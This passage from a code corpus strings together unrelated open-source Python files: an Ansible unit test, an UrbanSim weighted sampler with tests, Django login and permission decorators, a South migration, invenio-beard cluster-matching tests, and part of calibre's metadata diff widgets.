finally:
connection.close(logout=auth.get('token') is None)
if __name__ == "__main__":
main()
| gpl-3.0 |
t794104/ansible | test/units/module_utils/basic/test_dict_converters.py | 166 | 1032 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2016 Toshio Kuratomi <tkuratomi@ansible.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from units.mock.procenv import ModuleTestCase
from ansible.module_utils.six.moves import builtins
realimport = builtins.__import__
class TestTextifyContainers(ModuleTestCase):
def test_module_utils_basic_json_dict_converters(self):
from ansible.module_utils.basic import json_dict_unicode_to_bytes, json_dict_bytes_to_unicode
test_data = dict(
item1=u"Fóo",
item2=[u"Bár", u"Bam"],
item3=dict(sub1=u"Súb"),
item4=(u"föo", u"bär", u"©"),
item5=42,
)
res = json_dict_unicode_to_bytes(test_data)
res2 = json_dict_bytes_to_unicode(res)
self.assertEqual(test_data, res2)
| gpl-3.0 |
iut-ibk/DynaMind-UrbanSim | 3rdparty/opus/src/opus_core/samplers/weighted_sampler.py | 2 | 14239 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.resources import Resources
from opus_core.session_configuration import SessionConfiguration
from opus_core.datasets.dataset_pool import DatasetPool
from numpy import where, arange, take, ones, newaxis, ndarray, zeros, concatenate, resize
from numpy import searchsorted, column_stack
from opus_core.samplers.constants import UNPLACED_ID
from opus_core.sampling_toolbox import prob2dsample, probsample_noreplace, normalize
from opus_core.sampling_toolbox import nonzerocounts
from opus_core.misc import lookup
from opus_core.logger import logger
from opus_core.sampler import Sampler
from opus_core.datasets.interaction_dataset import InteractionDataset
from opus_core.variables.variable_name import VariableName
class weighted_sampler(Sampler):
def run(self, dataset1, dataset2, index1=None, index2=None, sample_size=10, weight=None,
include_chosen_choice=False, with_replacement=False, resources=None, dataset_pool=None):
"""this function samples number of sample_size (scalar value) alternatives from dataset2
for agent set specified by dataset1.
If index1 is not None, only samples alterantives for agents with indices in index1;
if index2 is not None, only samples alternatives from indices in index2.
sample_size specifies number of alternatives to be sampled for each agent.
weight, to be used as sampling weight, is either an attribute name of dataset2, or a 1d
array of the same length as index2 or 2d array of shape (index1.size, index2.size).
Also refer to document of interaction_dataset"""
if dataset_pool is None:
try:
sc = SessionConfiguration()
dataset_pool=sc.get_dataset_pool()
except:
dataset_pool = DatasetPool()
local_resources = Resources(resources)
local_resources.merge_if_not_None(
{"dataset1": dataset1, "dataset2": dataset2,
"index1":index1, "index2": index2,
"sample_size": sample_size, "weight": weight,
"with_replacement": with_replacement,
"include_chosen_choice": include_chosen_choice})
local_resources.check_obligatory_keys(['dataset1', 'dataset2', 'sample_size'])
agent = local_resources["dataset1"]
index1 = local_resources.get("index1", None)
if index1 is None:
index1 = arange(agent.size())
choice = local_resources["dataset2"]
index2 = local_resources.get("index2", None)
if index2 is None:
index2 = arange(choice.size())
if index1.size == 0 or index2.size == 0:
err_msg = "either choice size or agent size is zero, return None"
logger.log_warning(err_msg)
return None
include_chosen_choice = local_resources.get("include_chosen_choice", False)
J = local_resources["sample_size"]
if include_chosen_choice:
J = J - 1
with_replacement = local_resources.get("with_replacement")
weight = local_resources.get("weight", None)
if isinstance(weight, str):
if weight in choice.get_known_attribute_names():
weight=choice.get_attribute(weight)
rank_of_weight = 1
elif VariableName(weight).get_dataset_name() == choice.get_dataset_name():
weight=choice.compute_variables(weight, dataset_pool=dataset_pool)
rank_of_weight = 1
else:
## weights can be an interaction variable
interaction_dataset = InteractionDataset(local_resources)
weight=interaction_dataset.compute_variables(weight, dataset_pool=dataset_pool)
rank_of_weight = 2
elif isinstance(weight, ndarray):
rank_of_weight = weight.ndim
elif not weight: ## weight is None or empty string
weight = ones(index2.size)
rank_of_weight = 1
else:
err_msg = "unkown weight type"
logger.log_error(err_msg)
raise TypeError, err_msg
        if (weight.size != index2.size) and (weight.shape[rank_of_weight-1] != index2.size):
if weight.shape[rank_of_weight-1] == choice.size():
if rank_of_weight == 1:
weight = take(weight, index2)
if rank_of_weight == 2:
weight = take(weight, index2, axis=1)
else:
err_msg = "weight array size doesn't match to size of dataset2 or its index"
logger.log_error(err_msg)
raise ValueError, err_msg
prob = normalize(weight)
#chosen_choice = ones(index1.size) * UNPLACED_ID
chosen_choice_id = agent.get_attribute(choice.get_id_name()[0])[index1]
#index_of_placed_agent = where(greater(chosen_choice_id, UNPLACED_ID))[0]
chosen_choice_index = choice.try_get_id_index(chosen_choice_id, return_value_if_not_found=UNPLACED_ID)
chosen_choice_index_to_index2 = lookup(chosen_choice_index, index2, index_if_not_found=UNPLACED_ID)
if rank_of_weight == 1: # if weight_array is 1d, then each agent shares the same weight for choices
            replace = with_replacement # sampling with/without replacement
if nonzerocounts(weight) < J:
logger.log_warning("weight array dosen't have enough non-zero counts, use sample with replacement")
replace = True
sampled_index = prob2dsample( index2, sample_size=(index1.size, J),
prob_array=prob, exclude_index=chosen_choice_index_to_index2,
replace=replace, return_index=True )
#return index2[sampled_index]
if rank_of_weight == 2:
sampled_index = zeros((index1.size,J), dtype="int32") - 1
for i in range(index1.size):
replace = with_replacement # sampling with/without replacement
i_prob = prob[i,:]
if nonzerocounts(i_prob) < J:
logger.log_warning("weight array dosen't have enough non-zero counts, use sample with replacement")
replace = True
#exclude_index passed to probsample_noreplace needs to be indexed to index2
sampled_index[i,:] = probsample_noreplace( index2, sample_size=J, prob_array=i_prob,
exclude_index=chosen_choice_index_to_index2[i],
return_index=True )
sampling_prob = take(prob, sampled_index)
sampled_index = index2[sampled_index]
is_chosen_choice = zeros(sampled_index.shape, dtype="bool")
#chosen_choice = -1 * ones(chosen_choice_index.size, dtype="int32")
if include_chosen_choice:
sampled_index = column_stack((chosen_choice_index[:,newaxis],sampled_index))
is_chosen_choice = zeros(sampled_index.shape, dtype="bool")
is_chosen_choice[chosen_choice_index!=UNPLACED_ID, 0] = 1
#chosen_choice[where(is_chosen_choice)[0]] = where(is_chosen_choice)[1]
## this is necessary because prob is indexed to index2, not to the choice set (as is chosen_choice_index)
sampling_prob_for_chosen_choices = take(prob, chosen_choice_index_to_index2[:, newaxis])
## if chosen choice chosen equals unplaced_id then the sampling prob is 0
sampling_prob_for_chosen_choices[where(chosen_choice_index==UNPLACED_ID)[0],] = 0.0
sampling_prob = column_stack([sampling_prob_for_chosen_choices, sampling_prob])
interaction_dataset = self.create_interaction_dataset(dataset1, dataset2, index1, sampled_index)
interaction_dataset.add_attribute(sampling_prob, '__sampling_probability')
interaction_dataset.add_attribute(is_chosen_choice, 'chosen_choice')
## to get the older returns
#sampled_index = interaction_dataset.get_2d_index()
#chosen_choices = UNPLACED_ID * ones(index1.size, dtype="int32")
#where_chosen = where(interaction_dataset.get_attribute("chosen_choice"))
#chosen_choices[where_chosen[0]]=where_chosen[1]
#return (sampled_index, chosen_choice)
return interaction_dataset
from opus_core.tests import opus_unittest
from numpy import array, all, alltrue, not_equal, equal, repeat, int32, where
from opus_core.datasets.dataset import Dataset
from opus_core.storage_factory import StorageFactory
class Test(opus_unittest.OpusTestCase):
def setUp(self):
storage = StorageFactory().get_storage('dict_storage')
storage.write_table(table_name='households',
table_data={
'household_id': arange(10)+1,
'grid_id': arange(-1, 9, 1)+1,
'lucky':array([1,0,1, 0,1,1, 1,1,0, 0])
}
)
storage.write_table(table_name='gridcells',
table_data={
'grid_id': arange(15)+1,
'filter':array([0,1,1, 1,1,1, 1,1,1, 0,1,0, 1,1,1]),
'weight':array([0.1,9,15, 2,5,1, 6,2.1,.3, 4,3,1, 10,8,7])
}
)
#create households
self.households = Dataset(in_storage=storage, in_table_name='households', id_name="household_id", dataset_name="household")
# create gridcells
self.gridcells = Dataset(in_storage=storage, in_table_name='gridcells', id_name="grid_id", dataset_name="gridcell")
def test_1d_weight_array(self):
""""""
sample_size = 5
# check the individual gridcells
        # This is a stochastic model, so it may legitimately fail occasionally.
index1 = where(self.households.get_attribute("lucky"))[0]
index2 = where(self.gridcells.get_attribute("filter"))[0]
weight=self.gridcells.get_attribute("weight")
for icc in [0,1]: #include_chosen_choice?
#icc = sample([0,1],1)
sampler_ret = weighted_sampler().run(dataset1=self.households, dataset2=self.gridcells, index1=index1,
index2=index2, sample_size=sample_size, weight="weight",include_chosen_choice=icc)
# get results
sampled_index = sampler_ret.get_2d_index()
chosen_choices = UNPLACED_ID * ones(index1.size, dtype="int32")
where_chosen = where(sampler_ret.get_attribute("chosen_choice"))
chosen_choices[where_chosen[0]]=where_chosen[1]
sample_results = sampled_index, chosen_choices
sampled_index = sample_results[0]
self.assertEqual(sampled_index.shape, (index1.size, sample_size))
if icc:
placed_agents_index = self.gridcells.try_get_id_index(
self.households.get_attribute("grid_id")[index1],UNPLACED_ID)
chosen_choice_index = resize(array([UNPLACED_ID], dtype="int32"), index1.shape)
w = where(chosen_choices>=0)[0]
# for 64 bit machines, need to coerce the type to int32 -- on a
# 32 bit machine the astype(int32) doesn't do anything
chosen_choice_index[w] = sampled_index[w, chosen_choices[w]].astype(int32)
self.assert_( alltrue(equal(placed_agents_index, chosen_choice_index)) )
sampled_index = sampled_index[:,1:]
self.assert_( alltrue(lookup(sampled_index.ravel(), index2, index_if_not_found=UNPLACED_ID)!=UNPLACED_ID) )
self.assert_( all(not_equal(weight[sampled_index], 0.0)) )
def test_2d_weight_array(self):
#2d weight
sample_size = 5
n = self.households.size()
index1 = where(self.households.get_attribute("lucky"))[0]
index2 = where(self.gridcells.get_attribute("filter"))[0]
lucky = self.households.get_attribute("lucky")
weight = repeat(self.gridcells.get_attribute("weight")[newaxis, :], n, axis=0)
for i in range(n):
weight[i,:] += lucky[i]
for icc in [0,1]:
sampler_ret = weighted_sampler().run(dataset1=self.households, dataset2=self.gridcells, index1=index1,
index2=index2, sample_size=sample_size, weight=weight,include_chosen_choice=icc)
sampled_index = sampler_ret.get_2d_index()
chosen_choices = UNPLACED_ID * ones(index1.size, dtype="int32")
where_chosen = where(sampler_ret.get_attribute("chosen_choice"))
chosen_choices[where_chosen[0]]=where_chosen[1]
self.assertEqual(sampled_index.shape, (index1.size, sample_size))
if icc:
placed_agents_index = self.gridcells.try_get_id_index(
self.households.get_attribute("grid_id")[index1],UNPLACED_ID)
chosen_choice_index = resize(array([UNPLACED_ID], dtype="int32"), index1.shape)
w = where(chosen_choices>=0)[0]
chosen_choice_index[w] = sampled_index[w, chosen_choices[w]].astype(int32)
self.assert_( alltrue(equal(placed_agents_index, chosen_choice_index)) )
sampled_index = sampled_index[:,1:]
self.assert_( alltrue(lookup(sampled_index.ravel(), index2, index_if_not_found=UNPLACED_ID)!=UNPLACED_ID) )
for j in range(sample_size):
self.assert_( all(not_equal(weight[j, sampled_index[j,:]], 0.0)) )
if __name__ == "__main__":
opus_unittest.main()
| gpl-2.0 |
ojengwa/talk | venv/lib/python2.7/site-packages/django/contrib/auth/decorators.py | 38 | 3020 | from functools import wraps
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.utils.decorators import available_attrs
from django.utils.six.moves.urllib.parse import urlparse
from django.shortcuts import resolve_url
def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
path = request.build_absolute_uri()
resolved_login_url = resolve_url(login_url or settings.LOGIN_URL)
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
login_scheme, login_netloc = urlparse(resolved_login_url)[:2]
current_scheme, current_netloc = urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
path, resolved_login_url, redirect_field_name)
return _wrapped_view
return decorator
def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated(),
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def permission_required(perm, login_url=None, raise_exception=False):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
If the raise_exception parameter is given the PermissionDenied exception
is raised.
"""
def check_perms(user):
if not isinstance(perm, (list, tuple)):
perms = (perm, )
else:
perms = perm
# First check if the user has the permission (even anon users)
if user.has_perms(perms):
return True
# In case the 403 handler should be called raise the exception
if raise_exception:
raise PermissionDenied
# As the last resort, show the login form
return False
return user_passes_test(check_perms, login_url=login_url)
| mit |
atiberghien/makerscience-server | makerscience_profile/migrations/0002_auto__add_field_makerscienceprofile_activity__add_field_makersciencepr.py | 1 | 6258 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'MakerScienceProfile.activity'
db.add_column(u'makerscience_profile_makerscienceprofile', 'activity',
self.gf('django.db.models.fields.CharField')(default='', max_length=255),
keep_default=False)
# Adding field 'MakerScienceProfile.location'
db.add_column(u'makerscience_profile_makerscienceprofile', 'location',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['scout.PostalAddress'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'MakerScienceProfile.activity'
db.delete_column(u'makerscience_profile_makerscienceprofile', 'activity')
# Deleting field 'MakerScienceProfile.location'
db.delete_column(u'makerscience_profile_makerscienceprofile', 'location_id')
models = {
u'accounts.profile': {
'Meta': {'object_name': 'Profile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'makerscience_profile.makerscienceprofile': {
'Meta': {'object_name': 'MakerScienceProfile'},
'activity': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['scout.PostalAddress']", 'null': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.Profile']"})
},
u'scout.postaladdress': {
'Meta': {'object_name': 'PostalAddress'},
'address_locality': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'address_region': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'post_office_box_number': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'street_address': ('django.db.models.fields.TextField', [], {'null': 'True'})
}
}
complete_apps = ['makerscience_profile'] | agpl-3.0 |
inspirehep/invenio-beard | tests/test_matching.py | 1 | 5408 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Test the matching algorithm."""
import json
import os
import unittest
from invenio_beard.matching import match_clusters
current_dir = os.path.dirname(__file__)
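# match_clusters(partition_before, partition_after) returns a 3-tuple:
# (matched_pairs, added_cluster_ids, removed_cluster_ids), as exercised by the
# assertions in the tests below.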
class TestMatching(unittest.TestCase):
"""Test different clusters."""
def test_the_same_clusters(self):
"""Test if the two exact clusters will be matched."""
signatures_before = {1: ['A', 'B']}
signatures_after = {2: ['A', 'B']}
match = match_clusters(signatures_before, signatures_after)
self.assertEquals(match, ([(1, 2)], [], []))
def test_cluster_adding(self):
"""Test if the new cluster will be distinguished."""
partition_before = {}
partition_after = {1: ['A', 'B']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([], [1], []))
def test_cluster_removal(self):
"""Test if the removed cluster will be distinguished."""
partition_before = {1: ['A', 'B']}
partition_after = {}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([], [], [1]))
def test_complex_matching(self):
"""Test more complex clustering with no removal or adding."""
partition_before = {1: ['A', 'B'], 2: ['C', 'D', 'E']}
partition_after = {3: ['A', 'C', 'E'], 4: ['B', 'D']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(1, 4), (2, 3)], [], []))
def test_complex_adding(self):
"""Test more complex clustering with adding a new cluster."""
partition_before = {1: ['A', 'B', 'C']}
partition_after = {2: ['A', 'B'], 3: ['C']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(1, 2)], [3], []))
def test_complex_removal(self):
"""Test more complex clustering with removing a cluster."""
partition_before = {1: ['A', 'B'], 2: ['C']}
partition_after = {3: ['A', 'B', 'C']}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(1, 3)], [], [2]))
def test_complex_subproblems(self):
"""Test the case, where there are at least two subproblems."""
partition_before = {1: ["A", "B", "C"],
2: ["D", "E"],
3: ["F"],
4: ["G"],
5: ["H"]}
partition_after = {6: ["A", "B"],
7: ["C", "D"],
8: ["E", "F"],
9: ["G"],
10: ["I"]}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([(4, 9), (1, 6), (2, 7), (3, 8)], [10], [5]))
    def test_wang_signatures(self):
"""Test the real output of Beard."""
with open(os.path.join(
current_dir, 'data/wang_clusters_1.json'), 'r') as file_before:
signatures_before = json.load(file_before)
match = match_clusters(signatures_before, signatures_before)
self.assertEquals(match, ([(u'158992', u'158992'),
(u'623639', u'623639'),
(u'623638', u'623638')], [], []))
    def test_wang_signatures_mixed_up(self):
        """Test the real output of Beard against a modified clustering."""
with open(os.path.join(
current_dir, 'data/wang_clusters_1.json'), 'r') as file_before:
signatures_before = json.load(file_before)
with open(os.path.join(
current_dir, 'data/wang_clusters_2.json'), 'r') as file_after:
signatures_after = json.load(file_after)
match = match_clusters(signatures_before, signatures_after)
self.assertEquals(match, ([(u'158992', u'158992'),
(u'623639', u'623639')],
[u'623638_to_add'], [u'623638']))
def test_almost_the_same_keys(self):
"""Test the case where the keys are the same after casting."""
partition_before = {1: ["A", "B", "C"],
"1": ["D", "E"]}
partition_after = {1: ["A", "B", "C"],
"1": ["D", "E"]}
match = match_clusters(partition_before, partition_after)
self.assertEquals(match, ([('1', '1'), (1, 1)], [], []))
| gpl-2.0 |
sharad/calibre | src/calibre/gui2/metadata/diff.py | 1 | 22039 | #!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
import os
from collections import OrderedDict, namedtuple
from functools import partial
from future_builtins import zip
from PyQt5.Qt import (
QDialog, QWidget, QGridLayout, QLineEdit, QLabel, QToolButton, QIcon,
QVBoxLayout, QDialogButtonBox, QApplication, pyqtSignal, QFont, QPixmap,
QSize, QPainter, Qt, QColor, QPen, QSizePolicy, QScrollArea, QFrame,
QKeySequence, QAction, QMenu)
from calibre import fit_image
from calibre.ebooks.metadata import title_sort, authors_to_sort_string
from calibre.gui2 import pixmap_to_data, gprefs
from calibre.gui2.comments_editor import Editor
from calibre.gui2.languages import LanguagesEdit as LE
from calibre.gui2.metadata.basic_widgets import PubdateEdit, RatingEdit
from calibre.ptempfile import PersistentTemporaryFile
from calibre.utils.date import UNDEFINED_DATE
Widgets = namedtuple('Widgets', 'new old label button')
# Widgets {{{
class LineEdit(QLineEdit):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
QLineEdit.__init__(self, parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
if not is_new:
self.setReadOnly(True)
self.textChanged.connect(self.changed)
@dynamic_property
def value(self):
def fget(self):
val = unicode(self.text()).strip()
ism = self.metadata['is_multiple']
if ism:
if not val:
val = []
else:
val = [x.strip() for x in val.split(ism['list_to_ui']) if x.strip()]
return val
def fset(self, val):
ism = self.metadata['is_multiple']
if ism:
if not val:
val = ''
else:
val = ism['list_to_ui'].join(val)
self.setText(val)
self.setCursorPosition(0)
return property(fget=fget, fset=fset)
def from_mi(self, mi):
val = mi.get(self.field, default='') or ''
self.value = val
def to_mi(self, mi):
val = self.value
mi.set(self.field, val)
if self.field == 'title':
mi.set('title_sort', title_sort(val, lang=mi.language))
elif self.field == 'authors':
mi.set('author_sort', authors_to_sort_string(val))
@dynamic_property
def current_val(self):
def fget(self):
return unicode(self.text())
def fset(self, val):
self.setText(val)
self.setCursorPosition(0)
return property(fget=fget, fset=fset)
@property
def is_blank(self):
val = self.current_val.strip()
if self.field in {'title', 'authors'}:
return val in {'', _('Unknown')}
return not val
def same_as(self, other):
return self.current_val == other.current_val
class LanguagesEdit(LE):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
LE.__init__(self, parent=parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.textChanged.connect(self.changed)
if not is_new:
self.lineEdit().setReadOnly(True)
@dynamic_property
def current_val(self):
def fget(self):
return self.lang_codes
def fset(self, val):
self.lang_codes = val
return property(fget=fget, fset=fset)
def from_mi(self, mi):
self.lang_codes = mi.languages
def to_mi(self, mi):
mi.languages = self.lang_codes
@property
def is_blank(self):
return not self.current_val
def same_as(self, other):
return self.current_val == other.current_val
class RatingsEdit(RatingEdit):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
RatingEdit.__init__(self, parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.valueChanged.connect(self.changed)
if not is_new:
self.setReadOnly(True)
def from_mi(self, mi):
val = (mi.get(self.field, default=0) or 0)/2
self.setValue(val)
def to_mi(self, mi):
mi.set(self.field, self.value() * 2)
@property
def is_blank(self):
return self.value() == 0
def same_as(self, other):
return self.current_val == other.current_val
class DateEdit(PubdateEdit):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
PubdateEdit.__init__(self, parent, create_clear_button=False)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.setDisplayFormat(extra)
self.dateTimeChanged.connect(self.changed)
if not is_new:
self.setReadOnly(True)
def from_mi(self, mi):
self.current_val = mi.get(self.field, default=None)
def to_mi(self, mi):
mi.set(self.field, self.current_val)
@property
def is_blank(self):
return self.current_val.year <= UNDEFINED_DATE.year
def same_as(self, other):
return self.text() == other.text()
class SeriesEdit(LineEdit):
def from_mi(self, mi):
series = mi.get(self.field, default='')
series_index = mi.get(self.field + '_index', default=1.0)
val = ''
if series:
val = '%s [%s]' % (series, mi.format_series_index(series_index))
self.setText(val)
self.setCursorPosition(0)
def to_mi(self, mi):
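        # Parse values of the form 'Series Name [3.0]' (as produced by from_mi
        # above) back into the series name and its numeric index.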
val = unicode(self.text()).strip()
try:
series_index = float(val.rpartition('[')[-1].rstrip(']').strip())
except:
series_index = 1.0
series = val.rpartition('[')[0].strip() or None
mi.set(self.field, series)
mi.set(self.field + '_index', series_index)
class IdentifiersEdit(LineEdit):
def from_mi(self, mi):
self.as_dict = mi.identifiers
def to_mi(self, mi):
mi.set_identifiers(self.as_dict)
@dynamic_property
def as_dict(self):
def fget(self):
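            # Parse comma-separated 'scheme:value' pairs (e.g. a hypothetical
            # 'isbn:123, doi:10.1/x') into a dict, dropping empty keys or values.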
parts = (x.strip() for x in self.current_val.split(',') if x.strip())
return {k:v for k, v in {x.partition(':')[0].strip():x.partition(':')[-1].strip() for x in parts}.iteritems() if k and v}
def fset(self, val):
val = ('%s:%s' % (k, v) for k, v in val.iteritems())
self.setText(', '.join(val))
self.setCursorPosition(0)
return property(fget=fget, fset=fset)
class CommentsEdit(Editor):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
Editor.__init__(self, parent, one_line_toolbar=False)
self.set_minimum_height_for_editor(150)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.hide_tabs()
if not is_new:
self.hide_toolbars()
self.set_readonly(True)
@dynamic_property
def current_val(self):
def fget(self):
return self.html
def fset(self, val):
self.html = val or ''
self.changed.emit()
return property(fget=fget, fset=fset)
def from_mi(self, mi):
val = mi.get(self.field, default='')
self.current_val = val
def to_mi(self, mi):
mi.set(self.field, self.current_val)
def sizeHint(self):
return QSize(450, 200)
@property
def is_blank(self):
return not self.current_val.strip()
def same_as(self, other):
return self.current_val == other.current_val
class CoverView(QWidget):
changed = pyqtSignal()
def __init__(self, field, is_new, parent, metadata, extra):
QWidget.__init__(self, parent)
self.is_new = is_new
self.field = field
self.metadata = metadata
self.pixmap = None
self.blank = QPixmap(I('blank.png'))
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.GrowFlag|QSizePolicy.ExpandFlag)
self.sizePolicy().setHeightForWidth(True)
@property
def is_blank(self):
return self.pixmap is None
@dynamic_property
def current_val(self):
def fget(self):
return self.pixmap
def fset(self, val):
self.pixmap = val
self.changed.emit()
self.update()
return property(fget=fget, fset=fset)
def from_mi(self, mi):
p = getattr(mi, 'cover', None)
if p and os.path.exists(p):
pmap = QPixmap()
with open(p, 'rb') as f:
pmap.loadFromData(f.read())
if not pmap.isNull():
self.pixmap = pmap
self.update()
self.changed.emit()
return
cd = getattr(mi, 'cover_data', (None, None))
if cd and cd[1]:
pmap = QPixmap()
pmap.loadFromData(cd[1])
if not pmap.isNull():
self.pixmap = pmap
self.update()
self.changed.emit()
return
self.pixmap = None
self.update()
self.changed.emit()
def to_mi(self, mi):
mi.cover, mi.cover_data = None, (None, None)
if self.pixmap is not None and not self.pixmap.isNull():
with PersistentTemporaryFile('.jpg') as pt:
pt.write(pixmap_to_data(self.pixmap))
mi.cover = pt.name
def same_as(self, other):
return self.current_val == other.current_val
def sizeHint(self):
return QSize(225, 300)
def paintEvent(self, event):
pmap = self.blank if self.pixmap is None or self.pixmap.isNull() else self.pixmap
target = self.rect()
scaled, width, height = fit_image(pmap.width(), pmap.height(), target.width(), target.height())
target.setRect(target.x(), target.y(), width, height)
p = QPainter(self)
p.setRenderHints(QPainter.Antialiasing | QPainter.SmoothPixmapTransform)
p.drawPixmap(target, pmap)
